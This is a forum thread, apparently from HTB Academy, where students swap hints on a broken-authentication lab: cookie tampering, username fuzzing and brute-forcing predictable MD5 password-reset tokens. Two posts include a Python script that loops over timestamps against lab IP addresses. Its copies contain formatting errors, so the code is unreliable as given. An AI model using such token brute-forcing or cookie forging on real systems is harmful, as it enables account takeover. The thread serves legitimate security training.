BROKEN AUTHENTICATION module | HTB Academy

Splatt · December 2, 2021, 11:12pm

Hi All - Looking for help in pointing me in the right direction for the skills assessment at the end of this course.

I have worked out the cookie encoding and fuzzing the m****** page I can only find accounts for guest and support.

I can alter the cookie so that I can be “support” but this always directs me to the error page indicating that “support” cannot log on with that role.

Are there other users that I’m missing? I cannot find any old accounts that are mentioned on the support page and stuck at where to try next.

Any pointers?

Satellite · December 3, 2021, 7:06am

first, we have to understand the service on this page, try to enumerate manually, read all content, and understand what it said.
next, we have to try the functions on it, the important point is to understand this service!

Splatt · December 3, 2021, 4:20pm

cracked it…thanks Satellite!

cherryeater · December 17, 2021, 8:53am

Could someone hint me with the “Broken Authentication” , “Bruteforcing Usernames” section ./question2/ Broken Authentication Login - User inference!?
I can find yet neither pre-filled input nor the ‘failed_login’ cookie, just the “Invalid credentials” in responds.
I have fuzzed the “Username”, “wronguser”, both of them with Burp intruder and manually using top-usernames-shortlist.txt - nothing interesting. Perhaps I have overlooked smth? Response source is not seems to be unusual.

akiraowen · December 17, 2021, 12:39pm

I still can’t get this, I’ve found 4 accounts and cannot cookie them (cannot have requested role). I’ve tried all combinations of ffuf against r*.php and m*.php but no working hit. Any other hint? thanks

Satellite · December 17, 2021, 12:57pm

use the dictionary that is mentioned in this section (bruteforcing username)

cherryeater · December 17, 2021, 4:08pm

I have got it in the a expected way and it implies with belief in the given hint review the code carefully.

j0rg3k · December 30, 2021, 8:34am

hi all, I can’t find the way to make htbadmin token work. banging my head on wall

cherryeater · December 30, 2021, 6:51pm

I will happy to help you without spoilering if you still needed.

staphy · December 31, 2021, 5:46pm

hi can you help pls i am converting the time printed on the page to epoch then adding +1000 -1000 this is my script
from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = “http://138.68.149.48:32593/question1/”

header= {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8” , “Content-Type”: “application/x-www-form-urlencoded”}
now = int(1640972294000)
start_time = now
fail_text = “Wrong token”
user=“htbadmin”
endtime=now+1000

for x in range(start_time-1000, endtime):
raw_data = user+str(x)
md5_token = md5(str(raw_data).encode()).hexdigest()
data =“token={md5_token}&submit=check”

print("checking {} {}".format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()


    exit()

Satellite · December 31, 2021, 6:28pm

try it

staphy · December 31, 2021, 6:43pm

it workedd thanks mate ,dunno what was wrong with my epoch

aKnife · January 13, 2022, 10:03am

Can you give any more hints?

stavros · February 21, 2022, 4:41am

hi im stuck in Predictable Reset Token i rewrite the script but i cant get the token can someone help

Tommy1337 · February 21, 2022, 4:58am

Did you keep in mind the different time zones? The displayed time zone is your local time zone in UTC, the server might have a different one. Thus, ±1 s is probably not enough

stavros · February 21, 2022, 5:01am

i take the time given in server responce i pass it as milliseconds but nothing, i also tried with my time

Tommy1337 · February 21, 2022, 5:07am

Ok, but the given server time zone might not be the real one. Try to use greater offset instead of ±1 s. For speeding things up, try to generate the given token (which can be conducted offline).

Satellite · February 21, 2022, 5:39am

Text me If you want!
I will support you!
my discord satellite#1213

stavros · February 21, 2022, 6:04am

i find it tnx for the help! i get it with wfuzz, i will try it with my script again to find why it dosent work

CrazyHorse302 · April 21, 2022, 10:55pm

Can anyone give me a hand with the Predictable Reset Token questions? I am stuck on question 1 right now. I think I should be using something like the python script that is referenced in the module and above. Not sure what I am missing on it.

from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://46.101.81.30:32186/question1/"

header= {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8” , “Content-Type”: “application/x-www-form-urlencoded”}
now = int(1650581532000)
start_time = now
fail_text = "Wrong token"
user= "htbadmin"
endtime=now+1000

for x in range(start_time-1000, endtime):
** raw_data = user+str(x)**
** md5_token = md5(str(raw_data).encode()).hexdigest()**
** data =“token={md5_token}&submit=check”**

print(“checking {} {}”.format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
** print(res.text)**
** print("[*] Congratulations! raw reply printed before")**
** exit()**

** exit()**